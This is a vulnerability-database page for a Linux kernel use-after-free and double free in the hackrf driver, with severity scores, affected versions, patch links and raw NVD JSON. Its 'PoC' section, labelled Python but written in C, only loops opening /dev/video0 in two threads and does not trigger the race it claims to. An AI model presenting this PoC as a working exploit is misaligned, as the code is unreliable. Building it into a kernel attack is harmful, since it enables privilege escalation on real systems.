CVE-2026-31576

Description

In the Linux kernel, the following vulnerability has been resolved: media: hackrf: fix to not free memory after the device is registered in hackrf_probe() In hackrf driver, the following race condition occurs: ``` CPU0 CPU1 hackrf_probe() kzalloc(); // alloc hackrf_dev .... v4l2_device_register(); .... fd = sys_open("/path/to/dev"); // open hackrf fd .... v4l2_device_unregister(); .... kfree(); // free hackrf_dev .... sys_ioctl(fd, ...); v4l2_ioctl(); video_is_registered() // UAF!! .... sys_close(fd); v4l2_release() // UAF!! hackrf_video_release() kfree(); // DFB!! ``` When a V4L2 or video device is unregistered, the device node is removed so new open() calls are blocked. However, file descriptors that are already open-and any in-flight I/O-do not terminate immediately; they remain valid until the last reference is dropped and the driver's release() is invoked. Therefore, freeing device memory on the error path after hackrf_probe() has registered dev it will lead to a race to use-after-free vuln, since those already-open handles haven't been released yet. And since release() free memory too, race to use-after-free and double-free vuln occur. To prevent this, if device is registered from probe(), it should be modified to free memory only through release() rather than calling kfree() directly.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel (修复版本前)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <pthread.h>

#define DEVICE_PATH "/dev/video0" // Assuming hackrf device node

void* thread_func(void* arg) {
    int fd;
    while (1) {
        fd = open(DEVICE_PATH, O_RDWR);
        if (fd < 0) continue;
        // Simulate racing with probe failure by keeping fd open
        // In a real scenario, trigger device reset/load concurrently
        usleep(100);
        close(fd);
    }
    return NULL;
}

int main() {
    pthread_t t1, t2;
    
    printf("Starting PoC for CVE-2026-31576...\n");
    
    pthread_create(&t1, NULL, thread_func, NULL);
    pthread_create(&t2, NULL, thread_func, NULL);
    
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31576
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31576
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31576/
[4] VulDB https://vuldb.com/cve/CVE-2026-31576
[5] https://git.kernel.org/stable/c/07e9e674b6146b1f6fc41b1f54b8968bf2802824
[6] https://git.kernel.org/stable/c/2145c71a8044362e82e9923f001ba2aeb771b848
[7] https://git.kernel.org/stable/c/3b7da2b4d0fe014eff181ed37e3bf832eb8ed258
[8] https://git.kernel.org/stable/c/45cbaf5c7cdc5386d86377f0daf94a17a007fed0
[9] https://git.kernel.org/stable/c/98a0a81ce78020c2522e0046f49d200de9778cb9
[10] https://git.kernel.org/stable/c/fcd1d70792a35c8a97414fe429f48311e41269c2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31576", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:32.230", "lastModified": "2026-04-27T20:40:20.953", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: hackrf: fix to not free memory after the device is registered in hackrf_probe()\n\nIn hackrf driver, the following race condition occurs:\n```\n\t\tCPU0\t\t\t\t\t\tCPU1\nhackrf_probe()\n kzalloc(); // alloc hackrf_dev\n ....\n v4l2_device_register();\n ....\n\t\t\t\t\t\tfd = sys_open(\"/path/to/dev\"); // open hackrf fd\n\t\t\t\t\t\t....\n v4l2_device_unregister();\n ....\n kfree(); // free hackrf_dev\n ....\n\t\t\t\t\t\tsys_ioctl(fd, ...);\n\t\t\t\t\t\t v4l2_ioctl();\n\t\t\t\t\t\t video_is_registered() // UAF!!\n\t\t\t\t\t\t....\n\t\t\t\t\t\tsys_close(fd);\n\t\t\t\t\t\t v4l2_release() // UAF!!\n\t\t\t\t\t\t hackrf_video_release()\n\t\t\t\t\t\t kfree(); // DFB!!\n```\n\nWhen a V4L2 or video device is unregistered, the device node is removed so\nnew open() calls are blocked.\n\nHowever, file descriptors that are already open-and any in-flight I/O-do\nnot terminate immediately; they remain valid until the last reference is\ndropped and the driver's release() is invoked.\n\nTherefore, freeing device memory on the error path after hackrf_probe()\nhas registered dev it will lead to a race to use-after-free vuln, since\nthose already-open handles haven't been released yet.\n\nAnd since release() free memory too, race to use-after-free and\ndouble-free vuln occur.\n\nTo prevent this, if device is registered from probe(), it should be\nmodified to free memory only through release() rather than calling\nkfree() directly."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.6.136", "matchCriteriaId": "14109CEF-714B-4029-A318-97AA58A01833"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.83", "matchCriteriaId": "7F0AE5B5-23AC-4DCC-B37A-51CA1DAE7BA8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.24", "matchCriteriaId": "8126B8B8-6D0B-4443-86C1-672AEE893555"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.14", "matchCriteriaId": "D6A8A074-BBF4-4803-ABED-519A839435BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0", "versionEndExcluding": "7.0.1", "matchCriteriaId": "9B5888AB-7403-4335-89E4-21CC0B48366A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/07e9e674b6146b1f6fc41b1f54b8968bf2802824", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2145c71a8044362e82e9923f001ba2aeb771b848", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3b7da2b4d0fe014eff181ed37e3bf832eb8ed258", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/45cbaf5c7cdc5386d86377f0daf94a17a007fed0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/98a0a81ce78020c2522e0046f49d200de9778cb9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fcd1d70792a35c8a97414fe429f48311e41269c2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}